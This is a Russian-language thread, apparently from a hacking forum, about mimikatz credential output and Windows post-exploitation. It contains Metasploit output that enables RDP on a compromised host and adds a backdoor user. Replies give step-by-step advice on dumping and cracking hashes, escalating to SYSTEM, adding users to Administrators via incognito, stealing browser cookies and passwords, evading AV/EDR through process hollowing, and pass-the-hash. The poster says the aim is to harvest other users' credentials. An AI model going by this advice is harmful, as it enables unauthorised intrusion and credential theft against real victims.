первый раз с таким сталкиваюсь,
кто подскажет что это, и можно ли это как-то использовать что б узнать пас
кто подскажет что это, и можно ли это как-то использовать что б узнать пас
-
XSS.stack #1 – первый литературный журнал от юзеров форума
вывод creds_all
- Автор темы Chairman
- Дата начала
-
- Теги
- #creds_all #mimikatz
- Автор темы
- Добавить закладку
- #2
Так вот она какая!
Надо снять дамп и расшифровать, если тебе принципиально нужен пароль, а если нужен доступ, создай юзера другого и не мучайся
- Автор темы
- Добавить закладку
- #4
в пост эксплуатации у меня мало опыта, в приоритете зайти под существующим юзером и собрать как можно больше инфы,
куки и пассы с браузеров и т.д.,
поэтому хеши существующих юзеров на первом месте,
а в этот раз даже учетка создалась криво.
юзер добавился только в группу 'Remote Desktop Users', а в админскую нет, хотя обычно добавляется в обе.
да и зайти я не смог под созданной учеткой,
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: user1234 with Password: pass1234
[*] Adding User: user1234 to local group 'Anvdare av fjrskrivbord' #Пользователи удаленного рабочего стола.
[*] The following Error was encountered: Encoding::UndefinedConversionError "\xE4" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20210611141437_default_192.168.30.2_host.windows.cle_348131.txt
[*] Post module execution completed
куки и пассы с браузеров и т.д.,
поэтому хеши существующих юзеров на первом месте,
а в этот раз даже учетка создалась криво.
юзер добавился только в группу 'Remote Desktop Users', а в админскую нет, хотя обычно добавляется в обе.
да и зайти я не смог под созданной учеткой,
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: user1234 with Password: pass1234
[*] Adding User: user1234 to local group 'Anvdare av fjrskrivbord' #Пользователи удаленного рабочего стола.
[*] The following Error was encountered: Encoding::UndefinedConversionError "\xE4" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20210611141437_default_192.168.30.2_host.windows.cle_348131.txt
[*] Post module execution completed
Если ты в систем процессе, то через load incognito можно добавить юзера в любую локальную группу в тч Администраторс
как вариант повысить привилегии до системы, если их нету, и мигрировать в процесс пользователя, по крайней мере так получалось у меня в некоторых случаях, на тестовом стенде, может кто что толковее подскажет, но вытащить пароли с браузеров получалось только таким образом, и не всех пользователей ,а конкретно того от чьего имени запускал лазанью, давненько делал, сейчас может что покруче есть.
Либо мимикатсом запускать, пассы пользователей нужны как раз таки в виде нтлм хешей, тоже удобно)
Либо мимикатсом запускать, пассы пользователей нужны как раз таки в виде нтлм хешей, тоже удобно)
ты его в реал среде попробуй запустить так чтоб ав\едр не стригерило бро. У тебя не выйдет так изи как это покажется тем кто сюда придет с гугла и прочтет.
тсу - если на юзере: мигрируй в систем: инъекцией в процесс ( hollowing \ doppelganging ). от система снимай дамп, расхэшишь уже дома. потом pth-them-all ==> done
Последнее редактирование: